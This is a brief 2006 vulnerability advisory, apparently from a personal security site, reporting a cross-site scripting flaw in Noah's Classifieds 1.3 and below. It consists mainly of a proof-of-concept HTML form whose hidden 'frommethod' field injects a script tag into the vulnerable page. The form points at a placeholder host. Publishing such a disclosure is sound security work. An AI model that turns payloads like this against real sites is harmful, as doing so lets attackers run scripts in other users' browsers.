Noah's Classifieds Cross Site Scripting Vulnerability

Vendor: PhpOutsourcing
Vulnerable: Noah's Classified 1.3 and below

Bugtraq ID: 20463
Release date: 2006-10-11

Cross Site Scripting

<html>
<body>

<form method="POST" enctype="multipart/form-data" action="http://www.example.com/classifieds/index.php">

<input type="hidden" name="fromlist" value="advertisement">
<input type="hidden" name="frommethod" value="'><script>alert('XSS Vulnerable');</script>"
<input type="submit" value="Cancel" name="submit" class="button">

</form>

</body>
</html>
	

Solution

Edit the code.

• Advisories
• Cv
• Portfolio
• Liens

[zone14] - © 2004-2007 - Ce site est sous licence Creative Commons